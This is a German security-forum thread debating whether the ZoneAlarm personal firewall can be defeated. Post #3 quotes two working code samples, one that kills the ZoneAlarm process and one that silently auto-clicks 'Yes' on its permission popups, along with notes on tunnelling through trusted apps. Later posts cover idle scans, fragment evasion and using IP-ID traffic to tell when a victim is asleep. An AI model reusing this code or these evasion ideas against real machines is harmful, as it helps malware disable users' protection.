ZoneAlarm von außen abschießen?

#1 Hallo Leute.

Ich hab hier auf Empfehlung bei mir am Rechner Sygate deinstalliert und ZoneAlarm pro installiert. Man sagte mir hier auf dem Board das diese besser (sicherer und 'bedienerfreundlicher') sei also für nen Normalo wie mich.
Jetzt hab ich zufällig auf nen anderen Board (für Dauersauger **) gelesen das von ZoneAlarm abzuraten ist .

Zitat : 'Wenn man eine FW von aussen mit 2 Handgriffen abschiessen kann, ist das nicht gerade der Hit...'

Ist da was wares drann?

Gruß TS7...

#2 Wurde in dem anderen Board darauf genauer eingangen? Wenn ja, wie wär es mit einem Link?

Hier findest du einen sog. Penetrations-Test von ZA:
http://www.german-secure.de/index.php?option=articles&task=viewarticle&artid=59&Itemid=3

Leider fehlen gute Vergleichsmöglichkeiten, da ansonsten bisher nur Outpost getestet wurde...
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#3 Hab das nochmal rausgekramert ist etwas lang, wenn de mal Zeit und Lust hast kannste das ja mal durchlesen.

Zitat:
Damit ihr ALLE endlich den Müll von eurer Platte verbannt, mal ein paar Anleitungen, wie man Zonealarm austricksen kann sowie eine kurze (und unvollständige Zusammenfassung) weshalb Zonealarm & Co nix taugen:


Grund 1: Protokoll-Tunnel
Jedes Protokoll läßt sich tunneln - ein Proxy (wie er vielen Firewalls beiliegt, z.B. um Werbeinhalte oder Pop-Ups abzublocken) sind wirkungslos, wenn die eigentliche Kommunikation von innen nach außen (oder umgekehrt) via Tunnel erfolgt. Dabei verwenden Spyware und Trojaner gelegentlich eine Wirtsanwendung um mit der Außenwelt zu kommunizieren (Beispiele: Internet Explorer, Outlook Express, Media-Player, Real-Player, etc). Die Writsanwendung, die vorher in der Firewall frerigeschaltet wurde, wird für den Zugriff ins Netz verwendet, ohne das die Firewall erkennen kann, das es sich NICHT um einen normalen Port-80-Request handelt.
Daher hört der Schutz an dieser Stelle eindeutig auf (das trifft in Teilen im übrigen auf die ansonsten recht gute Sygate-Firewall zu).


Grund 2: Rechte-System
Wenn man unter WinNT/Win2k/WinXP als Administrator angemeldet ist (bzw. mit administrativen Rechten) laufen die Trojaner auf der gleichen Rechteebene wie die Firewall - daher kann eine Firewall dazu überredet werden, eine neue Regel zu akzeptieren (siehe Code-Beispiel2). Bei Win9x-Systemen ist dies ohnehin der Fall - bei WinNT/Win2k und WinXP ist es einzig und allein Faulheit (man könnte sich ja auch als normaler User anmelden).



Grund 3: Prozeß-Stabilität
Einzig die Firewall von Sygate ist Prozeßstabil - alle anderen können einfach abgeschossen werden. Siehe Code-Beispiel1 am Beispiel von Zonealarm.




Beispiel 1: Zonealarm beenden
Der Beispielcode beendet ZoneAlarm auf jedem Rechner kurz und schmerzlos.

code:--------------------------------------------------------------------------------
Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub
--------------------------------------------------------------------------------

Dann noch den Titel des Fenster jener Firewall herausfinden, den Code umschreiben dass er alle durchgeht, und der PC ist Firewallfrei.




Beispiel2: Neue Berechtigung vergeben bei Zonealarm


code:--------------------------------------------------------------------------------
//Diese Procedure drückt den 'Yes' Button des ZoneAlarm-Alarm-Popup-Fensters.
//Am besten, sie wird in einem Timer mit dem kleinst möglichen Zeitintervall ausgeführt.
//So kann man sicher sein, dass das Alarmfenster, wenn es auftaucht sehr schnell,
//und kaum merkbar wieder geschlossen, und mit 'YES' beantwortet wird.

//This Procedure press the 'Yes' button of the ZoneAlarm-Alarming-Popup-Window.
//Best way to use: write this procedure in your Project-Unit, put a Timer
// on your Form and execute the procedure in it with the smallest
// Timerintervall.

procedure HackZoneLabsZoneAlarm; //(c) Steve Tricky
var
ZoneAlarmYesButton :THandle;
ZoneAlarmRememberAnswer :Thandle;
begin
try
//try to find the Buttons on the older Version 2.1.44:
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&y yes_button');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember the answer each time I use this program.');

//If Buttons not found, try it with the newer Version 2.6.88:
If (ZoneAlarmYesButton = 0) or (ZoneAlarmRememberAnswer=0) then
begin
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&Yes');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember this answer the next time I use this program.');
end;

//If all Buttons are found, and visible: CLICK THEM !
If (ZoneAlarmYesButton <> 0) and (ZoneAlarmRememberAnswer <> 0) and (IsWindowVisible(ZoneAlarmYesButton)) and (IsWindowVisible(ZoneAlarmRememberAnswer)) then
begin
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONUP ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONUP ,0,0);
end;

except end;
end;
--------------------------------------------------------------------------------



Ich verbreite hier keine Geheimnisse - das jeder via google finden, wenn er nur wenige Stichwörter eingibt. Also keine Anmache deswegen.

Selber schuld, wer sowas noch verwendet.

#4 Hm, neu ist das alles nicht - bzw. schon veraltet, da sich z.B. der ZA-Prozess nicht mehr so einfach nach dem Code-Beispiel 1 abschießen lässt.

Außerdem sind das alles Maßnahmen, die die Firewall _von innen_ (also durch lokal ausgeführten Programm-Code) versuchen zu umgehen - und nicht von außen, wie du in deinem Eingangsposting geschrieben hast... bist du sicher, dass du die richtige Stelle zitiert hast?

Grundsätzlich sind alle Firewalls gleichermaßen von diesen (konzeptbedingten) Sicherheitslücken betroffen, allerdings sind gerade die Hersteller sowohl von Sygate als auch von ZA bemüht, entsprechende Gegenmaßnahmen zu implementieren.
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#5 Ich würde mal sagen lokale Programme kann man unter Windows eh ausser acht lassen da diese immer alles machen können. Selbst wenn man nur als User angemeldet ist. Gibt ja mehr als genug Lücken Admin zu werden und alle abzuschiessen. Windows ist eben einfach unsicher, kann man nicht ändern. Auch NT mit Novell ist da keine Ausnahme.

Solange man sich solche Programme aber erst garnich auf den Rechner lädt muß das Programm da von aussen durch und das wird schon schwerer. Wobei auch das bei allen mir bekannten und verbreiteten FW's möglich ist mit etwas Aufwand. Da aber normalerweise keiner diesen Aufwand betreibt und die FW's auch mehr vor Würmern schützen sollen als vor echten Hackern sollte man sich einfach eine der Testsieger FW's installieren und sich die Anleitung gut durchlesen um die ganzen Ausgaben und Einstellungen zu verstehen.

Wer meint man muß das nur Installieren und ist rundum sicher täuscht sich gewaltig. Es läuft letzendlich immer nur auf den Aufwand hinaus den jemand bereit ist zu betreiben. Solange du nix wichtiges besitzt reicht ZA richtig konfiguriert aus um dich zu schützen.

Gegen richtige Hacker hilft soetwas fast Null wenn sie einigermaßen gut sind. Aber da "noch" genügend ganz ohne Schutz sind ist a auch kaum Gefahr als Ziel in betracht zu kommen.

Das wichtigste ist nur das man auch aufpaßt was man im Netz runterlädt oder in der Mail anklickt. Wer nachläßig wird weil er meint er hat eine FW hat oft schon verloren.

#6

Zitat

Solange man sich solche Programme aber erst garnich auf den Rechner lädt muß das Programm da von aussen durch und das wird schon schwerer. Wobei auch das bei allen mir bekannten und verbreiteten FW's möglich ist mit etwas Aufwand.

Könntest du hier bitte etwas konkreter werden (zumindest den groben Ansatz, wir wollen hier ja keine Anleitungen geben... )?

Dazu sollte man noch erwähnen, dass hinter der "schützenden" Firewall überhaupt etwas sein muss, wo man "eindringen" kann, z.B. ein exploitbarer Server. Sind alle Ports sowieso dicht, hat man auch ohne Firewall _von außen_ nicht viel zu befürchten.
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#7 Das ist so leider nicht richtig und ausserdem ist bei Windows per default immer massig offen an Diensten. Aber selbst wenn man alles deaktiviert kann der Rechner immer noch als Zombie für einen Idlehostscan mißbraucht werden um nur ein Beispiel zu nennen. Dazu brauch es keinerlei offener Ports und selbst viele Hardwarerouter helfen da nicht

Und das man viele FW's durch fragmentierte Pakete oder speziell zusammengebastelte Fragmente die sich dann überschreiben usw. austricksen kann ist nichts neues. Zum Glück ist das nicht so einfach und nur mit viel lernen möglich (bis jetzt) so dass diese Gefahr noch nicht zu groß ist und privat wohl nocht vernachlässigt werden kann. Inzwischen setzen viele FW's die Framente auch schon vor der Analyse wieder zusammen was extrem wichtig ist. Ausserdem sollte die FW alle zu kleinen Fragmente unbeantwortet verwerfen. Ob die eigene das macht sollte der Hersteller sagen können. Wenn nicht hilft nur ein Selbsttest von aussen mit hping z.B.

#8 Äh, was genau ist jetzt "so nicht richtig"?

Du wirst doch wohl nicht behaupten, dass der "Missbrauch" für einen Idle Scan mit einem "Eindringen" in den eigenen Rechner gleichzusetzen ist...?
Da werden schlicht und ergreifend die Eigenheiten des Netzes ausgenutzt, um mit deiner "Hilfe" unbemerkt eine _andere_ Maschine zu scannen - imho nichts, wovor man sich schützen müsste.

Und wo man Anleitungen zum Beenden der Standard-Windows-Dienste findet, hab ich dir bereits in einem anderen Thread geschrieben.

Fragmentierte Pakete sind sicherlich ein Problem, aber wie du schon selbst schreibst, sind nicht mehr alle PFWs dagegen "anfällig" (soweit ich weiss z.B. Sygate).
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#9 Naja, ich finde das mit dem Idlescan aber nicht so lustig wenn meine IP bei jemanden im Log auftaucht als "Extrem-Scanner" Und da man dann in folge mit gespoofter IP Adresse ja noch mehr "lustige" Sachen machen kann finde ich schon das man sich dagegen schützen sollte wo es nur geht. Ausserdem sollte das Perimetergerät RST Pakete loggen die nicht auf eine selbst eingeleitete Verbindung kommen. Und da der Angreifer einen selber ja auch ansprechen muß um zu erfahren ob die IP-ID's erhöht wurden kann man evtl. mit diesen Logs später bei der Aufklärung helfen. Und man kann damit "beweisen" das man es nicht selber war der gescannt hat wenn es mal sein muß.

Sicher ist das ganze zwar kein Eindringen in den rechner aber ich persönlich finde das der Mißbrauch meiner Anlagen/Geräte auch so schon schlimm genug ist.

#10 Ich hab das schon in einem andern Thread geschrieben, daß das benutzen des eigenen Rechners durch 'Eindringlinge' in mein System Z.B: das meine IP auf den gescannten Rechner preisgegeben wird doch das Hauptproblem eines 'Normalo' User'S der seinen Rechner 24 h täglich online hat ist. Also nicht die Dateien auf dem eigenen Rechner sondern das andere 'Hacker' den eigenen Rechner 'Mißbrauchen' und wie kann man sich nun dagegen schützen z.B. wenn man einer normale PFW hat? Oder gibt es noch dagegen keinen Schutz? Man will ja nicht für andere die Verantwortung tragen!

Gruß TS7...

#11 Mit einer PFW kann man sich meines Wissens nicht schützen gegen so etwas da die eigentlichen IP Pakete immernoch von Windows kommen. Und da alle Winversion (Und auch viele Linux/Unix und MacOS X) diese Eigenart haben einfach durchzunummerieren hat man da so verloren.

Allerdings muß man sich da nicht gleich Sorgen machen. Zum Glück werden solche Scans extrem selten benutzt und die Gefahr für einen selber ist Minimal. Aber ich persönlich schütze mich eben wo man nur kann.

Das einzige was da wohl hilft ist einen guten Router (oder 486er mit Linux etc) vorschalten und darauf achten das dieses System nicht durchnummereiert. Oder immer einen Download laufen haben

Allerdings kann man was oft auch sehr interessant ist über die IP-ID's gucken zu welchen Zeiten wie viel Traffic bei jemandem durchgeht. Kann man zwar nicht auf ein par kb genau festlegen aber es reicht um zu gucken wann jemand wirklich "online" ist. Wenn ich sehe das bei jemanden immer nur zwischen 6-22 Uhr Daten durch die leitung gehen kann ich davon ausgehen das der Benutzer nachts schläft und mich in aller Ruhe um den PC kümmern. Es gibt da viele versteckte Gefahren die viele nichtmal ansatzweise in Betracht ziehen

Aber ich würde deshalb nicht losgehen und einen Router kaufen. Noch ist die Gefahr das man da von einem Script Kiddie so "benutzt" wird extrem gering. Ich persönlich logge hier aber alle Verstöße oder "komischen" Vorfälle mit. Hab auch schon zig Logfiles an die Telekom usw. weitergegeben oder Admins direkt angeschrieben und informiert das ihre Rechner Würmer oder Trojander drauf haben. Es ist immer wieder unglaublich wieviele selbst größere Anlagen teilweise komplett ungeschütze WinXP Rechner am Netz haben.

Mal sehen was erst passieren muß bis die Menschen begreifen das es auf einem Rechner mehr als nur Daten zu klauen gibt

#12 Öhm,

Zitat

die FW's auch mehr vor Würmern schützen sollen

Wie soll das denn gehen? nen Wurm mit ner PFW abhalten sich zu verbreiten oder einzunisten? Ist mir da was entgangen? Bitte um Aufklärung
Greetz
smaggmampf

#13 Hast' schon recht, eine PFW hauptsächlich als Schutz vor Würmern zu sehen, ist imho ein wenig "gewagt".

Aber:
Gerade in letzter Zeit gab/gibt es ja einige Würmer, die sich direkt über offene Server-Ports verbreiten, und daher grundsätzlich durch eine PFW von vorneherein abgeblockt werden können (Blaster, Mydoom.b,...)

Außerdem können viele E-Mail-Würmer, die sich über ihre eigene SMTP-Engine verschicken, durch PFWs an der Ausbreitung gehindert werden (davon abgesehen, dass dadurch auch der Befall des eigenen Rechners erkannt werden kann.)

Von daher ist die Aussage nicht ganz falsch.
__________
"Scheinsicherheit" - wie leicht lassen sich Viren- und Trojanerscanner austricksen?

#14 Ja, eine PFW kann da als erste Stufe schon wertvolle Arbeit verrichten wenn sie denn korrekt eingerichtet und auch verstanden wird. Wobei ich persönlich da lieber auf meine NIDS mit tagesaktuellen Signaturen setze die solche Würmer auch erkennt wenn ich mir die blind selber aus dem Web laden würde. Und zwar wird das IP Paket dann erstmal verworfen und gelangt somit nicht auf die Platte.

Das größte Problme was ich sehe ist die generelle Uninteressiertheit (Dummheit?) an dem ganzen Thema Sicherheit. Und wenn Interesse da ist dann meist nur ala "Wie werde ich böser Hacker". Wenn sich die Leute mal ihre FW Anleitungen und kleine Übersichten über die Thematik (Gibts ja genügend im Netz) verschaffen würden, nicht immer alles Umsonst haben wollen und jeden Super-Speed-Kostenlos-DSL-Beschleuniger runterladen würden ohne zu merken das sie gerade wieder auf einen Social Engineer reingefallen sind und sich freiwillig den neusten Dialer installieren

Ok, es gibt ganz sicher auch viele die nicht so denken und sich für ihre Sicherheit interessieren (Z.B. alle Leser hier denke ich mal) aber 90% denkt doch das sowas zeitverschwendung ist und eine PFW was für Feiglinge. Dabei ist selbst das schlechteste OS mit einer guten PFW und AntiVir Software schon so gut wie sicher gegen alle normalen Angriffe. Fast alle Würmer/Viren zur Zeit kommen entweder über Standardports wo selbst schlechtere PFW schützen können oder werden freiwillig geladen weil sie denken da gibts wieder was umsonst